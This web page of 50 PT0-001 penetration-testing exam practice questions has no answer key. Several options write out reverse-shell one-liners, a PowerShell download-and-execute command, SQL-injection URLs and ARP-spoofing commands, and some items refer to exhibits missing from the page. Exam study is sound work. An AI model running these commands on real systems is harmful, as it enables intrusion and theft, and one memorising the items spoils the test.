PT0-001 Practice Test Free – 50 Real Exam Questions to Boost Your Confidence
Preparing for the PT0-001 exam? Start with our PT0-001 Practice Test Free – a set of 50 high-quality, exam-style questions crafted to help you assess your knowledge and improve your chances of passing on the first try.
Taking a PT0-001 practice test free is one of the smartest ways to:
- Get familiar with the real exam format and question types
- Evaluate your strengths and spot knowledge gaps
- Gain the confidence you need to succeed on exam day
Below, you will find 50 free PT0-001 practice questions to help you prepare for the exam. These questions are designed to reflect the real exam structure and difficulty level.
Consider the following PowerShell command: powershell.exe IEX (New-Object Net.Webclient).downloadstring("http://site/script.ps1");Invoke-Cmdlet Which of the following BEST describes the actions performed by this command?
A. Set the execution policy.
B. Execute a remote script.
C. Run an encoded command.
D. Instantiate an object.
A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?
A. Karma attack
B. Deauthentication attack
C. Fragmentation attack
D. SSID broadcast flood
A penetration tester has discovered through automated scanning that a Tomcat server allows for the use of default credentials. Using default credentials, the tester is able to upload WAR files to the server. Which of the following is the MOST likely post-exploitation step?
A. Upload a customized /etc/shadow file.
B. Monitor network traffic.
C. Connect via SSH using default credentials.
D. Install web shell on the server.
A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)
A. Wait outside of the company’s building and attempt to tailgate behind an employee.
B. Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities, and attempt to gain access.
C. Use domain and IP registry websites to identify the company’s external netblocks and external facing applications.
D. Search social media for information technology employees who post information about the technologies they work with.
E. Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access.
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG
A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to use for this purpose? (Choose two.)
A. Tcpdump
B. Nmap
C. Wireshark
D. SSH
E. Netcat
F. Cain and Abel
During post-exploitation, a tester identifies that only system binaries will pass an egress filter and store a file with the following command: c:\creditcards.db>c:\winit\system32\calc.exe:creditcards.db Which of the following file system vulnerabilities does this command take advantage of?
A. Hierarchical file system
B. Alternate data streams
C. Backdoor success
D. Extended file system
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?
A. TCP SYN flood
B. SQL injection
C. XSS
D. XMAS scan
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
A. Stack pointer register
B. Index pointer register
C. Stack base pointer
D. Destination index register
Which of the following would be the BEST for performing passive reconnaissance on a target's external domain?
A. Peach
B. CeWL
C. OpenVAS
D. Shodan
After establishing a shell on a target system, Joe, a penetration tester, is aware that his actions have not been detected. He now wants to maintain persistent access to the machine. Which of the following methods would be MOST easily detected?
A. Run a zero-day exploit.
B. Create a new domain user with a known password.
C. Modify a known boot time service to instantiate a call back.
D. Obtain cleartext credentials of the compromised user.
Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a penetration test?
A. Penetration test findings often contain company intellectual property.
B. Penetration test findings could lead to consumer dissatisfaction if made public.
C. Penetration test findings are legal documents containing privileged information.
D. Penetration test findings can assist an attacker in compromising a system.
A client has voiced concern about the number of companies being breached by remote attackers, who are looking for trade secrets. Which of the following BEST describes the type of adversaries this would identify?
A. Script kiddies
B. APT actors
C. Insider threats
D. Hacktivist groups
A penetration tester is reviewing the following output from a wireless sniffer: Which of the following can be extrapolated from the above information?
A. Hardware vendor
B. Channel interference
C. Usernames
D. Key strength
Which of the following commands starts the Metasploit database?
A. msfconsole
B. workspace
C. msfvenom
D. db_init
E. db_connect
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
A. nc 192.168.1.5 44444
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
D. nc -e /bin/sh 192.168.1.5 44444
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
Joe, an attacker, intends to transfer funds discreetly from a victim's account to his own. Which of the following URLs can he use to accomplish this attack?
A. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=False&creditaccount='OR 1=1 AND select username from testbank.custinfo where username like 'Joe'--&amount=200
B. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=False&creditaccount='OR 1=1 AND select username from testbank.custinfo where username like 'Joe' &amount=200
C. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=True&creditaccount='OR 1=1 AND select username from testbank.custinfo where username like 'Joe' --&amount=200
D. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=True&creditaccount='AND 1=1 AND select username from testbank.custinfo where username like 'Joe' --&amount=200
A penetration tester is reviewing a Zigbee implementation for security issues. Which of the following device types is the tester MOST likely testing?
A. Router
B. IoT
C. WAF
D. PoS
A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?
A. The physical location and network ESSIDs to be tested
B. The number of wireless devices owned by the client
C. The client’s preferred wireless access point vendor
D. The bands and frequencies used by the client’s devices
Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?
A. LSASS
B. SAM database
C. Active Directory
D. Registry
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
A. perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;
B. ssh superadmin@ -p 443
C. nc -e /bin/sh 443
D. bash -i >& /dev/tcp//443 0>&1
Which of the following can be used to perform online password attacks against RDP?
A. Hashcat
B. John the Ripper
C. Aircrack-ng
D. Ncrack
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
A. From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal
B. From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm
C. From the remote computer, run the following command: ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10 "xhost+; xterm"
D. From the local computer, run the following command: nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192.168.1.10 6000
A penetration tester discovers an anonymous FTP server that is sharing the C:\ drive. Which of the following is the BEST exploit?
A. Place a batch script in the startup folder for all users.
B. Change a service binary location path to point to the tester’s own payload.
C. Escalate the tester’s privileges to SYSTEM using the at.exe command.
D. Download, modify, and reupload a compromised registry to obtain code execution.
A penetration tester runs the following on a machine: Which of the following will be returned?
A. 1
B. 3
C. 5
D. 6
A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below: IP: 192.168.1.20 - NETMASK: 255.255.255.0 - DEFAULT GATEWAY: 192.168.1.254 - DHCP: 192.168.1.253 - DNS: 192.168.10.10, 192.168.20.10 Which of the following commands should the malicious user execute to perform the MITM attack?
A. arpspoof -c both -r -t 192.168.1.1 192.168.1.20
B. arpspoof -t 192.168.1.20 192.168.1.254
C. arpspoof -c both -t 192.168.1.20 192.168.1.253
D. arpspoof -r -t 192.168.1.253 192.168.1.20
If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ae0b556ba8 Which of the following formats is the correct hash type?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
A penetration tester directly connects to an internal network. Which of the following exploits would work BEST for quick lateral movement within an internal network?
A. Crack password hashes in /etc/shadow for network authentication.
B. Launch dictionary attacks on RDP.
C. Conduct a whaling campaign.
D. Poison LLMNR and NBNS requests.
A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?
A. MAC address of the client
B. MAC address of the domain controller
C. MAC address of the web server
D. MAC address of the gateway
During a vulnerability assessment, the security consultant finds an XP legacy system that is running a critical business function. Which of the following mitigations is BEST for the consultant to conduct?
A. Update to the latest Microsoft Windows OS.
B. Put the machine behind the WAF.
C. Segment the machine from the main network.
D. Disconnect the machine.
A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy requirements to perform the test after major architectural changes. Which of the following is the BEST way to approach the project?
A. Design a penetration test approach, focusing on publicly released firewall DoS vulnerabilities.
B. Review the firewall configuration, followed by a targeted attack by a red team.
C. Perform a discovery scan to identify changes in the network.
D. Focus on an objective-based approach to assess network assets with a red team.
A penetration tester is checking a script to determine why some basic math errors are persisting. The expected result was the program outputting `True`. Given the output from the console above, which of the following explains how to correct the errors in the script? (Choose two.)
A. Change 'fi' to 'EndIf'.
B. Remove the 'let' in front of 'dest=5+5'.
C. Change the '=' to '-eq'.
D. Change 'source' and 'dest' to "$source" and "$dest".
E. Change ‘else’ to ‘elif’.
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?
A. fpipe.exe -1 8080 -r 80 100.170.60.5
B. ike-scan -A -t 1 --sourceip=spoof_ip 100.170.60.5
C. nmap -sS -A -f 100.170.60.5
D. nc 100.170.60.5 8080 /bin/sh
A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command: for m in {1..254..1};do ping -c 1 192.168.101.$m; done Which of the following BEST describes the result of running this command?
A. Port scan
B. Service enumeration
C. Live host identification
D. Denial of service
During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
A. Disable the network port of the affected service.
B. Complete all findings, and then submit them to the client.
C. Promptly alert the client with details of the finding.
D. Take the target offline so it cannot be exploited by an attacker.
Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe is looking for a method that will enable him to enter the building during business hours or when there are no employees on-site. Which of the following would be the MOST effective in accomplishing this?
A. Badge cloning
B. Lock picking
C. Tailgating
D. Piggybacking
Which of the following BEST protects against a rainbow table attack?
A. Increased password complexity
B. Symmetric encryption
C. Cryptographic salting
D. Hardened OS configurations
A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL: http://www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd Which of the following attack types is MOST likely to be the vulnerability?
A. Directory traversal
B. Cross-site scripting
C. Remote file inclusion
D. User enumeration
During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests?
A. Ettercap
B. Tcpdump
C. Responder
D. Medusa
After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms?
A. Expand the password length from seven to 14 characters.
B. Implement password history restrictions.
C. Configure password filters.
D. Disable the accounts after five incorrect attempts.
E. Decrease the password expiration window.
A penetration tester has been hired to perform a penetration test for an organization. Which of the following is indicative of an error-based SQL injection attack?
A. a=1 or 1--
B. 1=1 or b--
C. 1=1 or 2--
D. 1=1 or a--
A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?
A. Discovery scan
B. Stealth scan
C. Full scan
D. Credentialed scan
A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?
A. arpspoof
B. nmap
C. responder
D. burpsuite
A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0>&1 Which of the following additional commands would need to be executed on the tester's Linux system to make the previous command successful?
A. nc -nlvp 443
B. nc 10.2.4.6. 443
C. nc -w3 10.2.4.6 443
D. nc -e /bin/sh 10.2.4.6. 443
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?
A. set rhost 192.168.1.10
B. run autoroute -s 192.168.1.0/24
C. db_nmap -iL /tmp/privatehosts.txt
D. use auxiliary/server/socks4a
A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan. The tester runs the following command: nmap -D 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130 Which of the following BEST describes why multiple IP addresses are specified?
A. The network is subnetted as a /25 or greater, and the tester needed to access hosts on two different subnets.
B. The tester is trying to perform a more stealthy scan by including several bogus addresses.
C. The scanning machine has several interfaces to balance the scan request across at the specified rate.
D. A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host.
Given the following script: Which of the following BEST describes the purpose of this script?
A. Log collection
B. Event collection
C. Keystroke monitoring
D. Debug message collection
A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?
A. Sample SOAP messages
B. The REST API documentation
C. A protocol fuzzing utility
D. An applicable XSD file
An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO's login credentials. Which of the following types of attacks is this an example of?
A. Elicitation attack
B. Impersonation attack
C. Spear phishing attack
D. Drive-by download attack
A vulnerability scan report shows what appears to be evidence of a memory disclosure vulnerability on one of the target hosts. The administrator claims the system is patched and the evidence is a false positive. Which of the following is the BEST method for a tester to confirm the vulnerability exists?
A. Manually run publicly available exploit code.
B. Confirm via evidence of the updated version number.
C. Run the vulnerability scanner again.
D. Perform dynamic analysis on the vulnerable service.
We regularly update this page with new practice questions, so be sure to check back frequently.
Good luck with your PT0-001 certification journey!